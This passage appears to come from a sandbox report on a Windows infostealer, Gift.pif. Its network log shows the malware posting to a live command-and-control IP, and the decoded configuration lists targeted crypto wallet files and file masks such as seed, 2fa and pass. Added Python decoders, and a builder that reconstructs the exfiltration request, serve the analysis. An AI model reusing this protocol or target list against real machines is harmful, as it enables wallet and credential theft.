                                                                        2024-08-05 16:56:21 UTC | 2228 | IN | Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                        Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:22 UTC | 325 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:22 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAKEGIJEHJDGDHJKJKKJCont
                                                                        2024-08-05 16:56:22 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:22 UTC | 2208 | IN | Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                        Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn
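Sessions 17 to 23 all follow one pattern: a multipart/form-data POST carrying a constant token and build_id, answered with a chunked reply that is either the two-byte ok or a base64 blob whose plaintext is a |-delimited configuration (wallet file locations in session 18, file masks for the Desktop grabber in session 19). The decoder below is an added example, not part of the Joe Sandbox report and not the malware's own code. Its sample inputs reproduce what the report displays for sessions 17, 18 and 19 and stop where the report truncates; the closing boundary in the POST body is assumed (the report cuts the body after the second field), and the names in WALLET_FIELDS are labels chosen for the example, since the meaning of the two numeric fields is not established by the trace.

```python
import base64
import re

# Constructed sample inputs, reproduced from what the trace shows. The POST body
# keeps only the two visible fields; the closing boundary is an assumption.
CHECKIN_BODY = (
    b"------HDHCFIJEGCAKJJKEHJJE\r\n"
    b'Content-Disposition: form-data; name="token"\r\n\r\n'
    b"371764cf8efc1b40dfc15a6ff874b301\r\n"
    b"------HDHCFIJEGCAKJJKEHJJE\r\n"
    b'Content-Disposition: form-data; name="build_id"\r\n\r\n'
    b"dc0c9f3971cace826e9cb1916d9d3a66\r\n"
    b"------HDHCFIJEGCAKJJKEHJJE--\r\n"
)
# The 12-byte acknowledgement seen after every upload (sessions 17, 20 to 23).
ACK_RESPONSE = b"2\r\nok\r\n0\r\n\r\n"
# Session 18: chunk-size line "8a8" (2216 bytes) followed by the 250 base64
# characters the report displays before cutting off.
WALLET_RESPONSE = b"8a8\r\n" + (
    b"Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBP"
    b"bGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQq"
    b"LmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8"
    b"MXxcRGFlZG"
)
# Session 19, same treatment (chunk size "894").
GRABBER_RESPONSE = b"894\r\n" + (
    b"RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEq"
    b"LiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4q LCphdXRoKi4qLCpsZWRnZXIq"
    b"LiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiou"
    b"KiwqaGl0Yn"
).replace(b" ", b"")

# Labels chosen for this example; the trace does not say what the two numeric
# columns mean (every entry has "1" in the second and "0" or "1" in the fifth).
WALLET_FIELDS = ("name", "flag_a", "path", "mask", "flag_b")


def parse_multipart_fields(body: bytes) -> dict[str, bytes]:
    """Pull name=value pairs out of a multipart/form-data body. The boundary is
    read from the first line, so the Content-Type header is not needed."""
    boundary = body[: body.find(b"\r\n")]
    fields: dict[str, bytes] = {}
    for part in body.split(boundary)[1:]:
        if part.startswith(b"--"):                 # closing delimiter
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                               # truncated part
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        if value.endswith(b"\r\n"):                # CRLF before next boundary is framing
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value
    return fields


def dechunk(body: bytes) -> tuple[bytes, bool]:
    """Decode HTTP/1.1 chunked transfer encoding. Returns (payload, complete);
    a chunk shorter than its declared size, as in a truncated capture, yields
    the bytes that are present with complete=False instead of an error."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False
        try:
            size = int(body[pos:eol].split(b";")[0].strip(), 16)
        except ValueError:
            return bytes(out), False
        pos = eol + 2
        if size == 0:
            return bytes(out), True
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False
        pos += size + 2


def b64_decode_lenient(blob: bytes) -> bytes:
    """Base64-decode a possibly truncated blob: drop anything outside the
    alphabet, discard a dangling single character and restore the padding."""
    clean = re.sub(rb"[^A-Za-z0-9+/]", b"", blob)
    rem = len(clean) % 4
    if rem == 1:
        clean, rem = clean[:-1], 0
    return base64.b64decode(clean + b"=" * ((4 - rem) % 4))


def decode_config_response(raw_body: bytes) -> tuple[str, bool]:
    payload, complete = dechunk(raw_body)
    return b64_decode_lenient(payload).decode("latin-1"), complete


def parse_pipe_records(text: str, fields=WALLET_FIELDS):
    """Split a '|'-delimited blob into fixed-width records; trailing fields
    that do not fill a record (truncation) are returned separately."""
    values, width = text.split("|"), len(fields)
    full = len(values) // width
    records = [dict(zip(fields, values[i * width:(i + 1) * width])) for i in range(full)]
    return records, values[full * width:]


if __name__ == "__main__":
    print(parse_multipart_fields(CHECKIN_BODY))
    print(dechunk(ACK_RESPONSE))
    config, complete = decode_config_response(WALLET_RESPONSE)
    for record in parse_pipe_records(config)[0]:
        print(record)
```

The two constant form fields are the useful network indicator here: the same token and build_id appear in every session, while the boundary strings change. The lenient decoders matter because sandbox traces are truncated at a fixed byte count, so a strict chunked or base64 decoder would reject exactly the responses worth reading.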


                                                                        Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:23 UTC | 326 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFB
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 7009
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:23 UTC | 7009 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAFHIIDHJEBFBFIDAKFBCont
                                                                        2024-08-05 16:56:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:26 UTC | 326 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 6985
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:26 UTC | 6985 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CFCFHJDBKJKEBFHJEHIICont
                                                                        2024-08-05 16:56:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:35 UTC | 327 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 32481
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:35 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAKEGIJEHJDGDHJKJKKJCont
                                                                        2024-08-05 16:56:35 UTC | 16126 | OUT | Data Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                        Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                        2024-08-05 16:56:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:36 UTC | 326 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 4421
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:36 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IDHIEBAAKJDHIECAAFHCCont
                                                                        2024-08-05 16:56:37 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49737 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:37 UTC | 326 | OUT | POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
  Host: 188.245.87.202
  Content-Length: 2449
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-08-05 16:56:37 UTC | 2449 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
  Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IDHIEBAAKJDHIECAAFHCCont
2024-08-05 16:56:38 UTC | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 16:56:37 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-08-05 16:56:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 2ok0
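The report shows each POST body only as a truncated hex prefix, and the reply only as the flattened string "2ok0". The following Python is an added example (not code from the Joe Sandbox report, from Joe Sandbox, or from the sample) that reconstructs a request in the same shape from the values on this page, parses the multipart framing to recover the `token` and `build_id` fields, decodes the 12-byte chunked reply back to `ok`, and checks a boundary against the shape every session here shares. The request body is constructed: only the first two parts copy captured values, the `file` part and its content are invented, and the four-dashes-plus-twenty-letters-A-to-K boundary check is a hunting heuristic derived from this capture alone, not a claim about how the malware family generates boundaries.

```python
# Added example: reconstruct and inspect the multipart POSTs captured above.
# Constructed input; see the lead-in for what is copied and what is invented.
import re
from typing import List

# Values copied from the session 23 request and response in the report.
BOUNDARY = "----IDHIEBAAKJDHIECAAFHC"
TOKEN = "371764cf8efc1b40dfc15a6ff874b301"
BUILD_ID = "dc0c9f3971cace826e9cb1916d9d3a66"
USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36")
RESPONSE_RAW_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"  # the 12-byte reply shown as "2ok0"
CRLF = b"\r\n"


def hex_dump_to_bytes(dump: str) -> bytes:
    """Convert a 'Data Raw' hex listing from the report into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def build_sample_request(boundary: str) -> bytes:
    """Construct a complete request in the shape of the captured ones.
    Header lines mirror the report; Content-Length is computed from the
    constructed body so the request is self-consistent."""
    delim = b"--" + boundary.encode()
    body = b"".join([
        delim + CRLF + b'Content-Disposition: form-data; name="token"' + CRLF + CRLF + TOKEN.encode() + CRLF,
        delim + CRLF + b'Content-Disposition: form-data; name="build_id"' + CRLF + CRLF + BUILD_ID.encode() + CRLF,
        delim + CRLF + b'Content-Disposition: form-data; name="file"; filename="information.txt"' + CRLF
        + b"Content-Type: application/octet-stream" + CRLF + CRLF
        + b"constructed placeholder for the exfiltrated data" + CRLF,   # invented part, see lead-in
        delim + b"--" + CRLF,                                            # closing delimiter
    ])
    headers = [
        b"POST / HTTP/1.1",
        b"Content-Type: multipart/form-data; boundary=" + boundary.encode(),
        b"User-Agent: " + USER_AGENT.encode(),
        b"Host: 188.245.87.202",
        b"Content-Length: " + str(len(body)).encode(),
        b"Connection: Keep-Alive",
        b"Cache-Control: no-cache",
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def parse_multipart(body: bytes, boundary: str) -> List[dict]:
    """Split a multipart/form-data body into parts using RFC 2046 framing.
    Each part is {'name', 'filename' (None for plain fields), 'data'};
    parsing stops at the closing delimiter '--<boundary>--'."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:          # [0] is the preamble, empty here
        if chunk.startswith(b"--"):              # closing delimiter reached
            break
        if chunk.startswith(CRLF):
            chunk = chunk[2:]
        head, _, data = chunk.partition(CRLF + CRLF)
        if data.endswith(CRLF):                  # that CRLF belongs to the next delimiter
            data = data[:-2]
        name = re.search(rb'(?<!file)name="([^"]*)"', head)   # do not match 'filename='
        filename = re.search(rb'filename="([^"]*)"', head)
        parts.append({
            "name": name.group(1).decode() if name else None,
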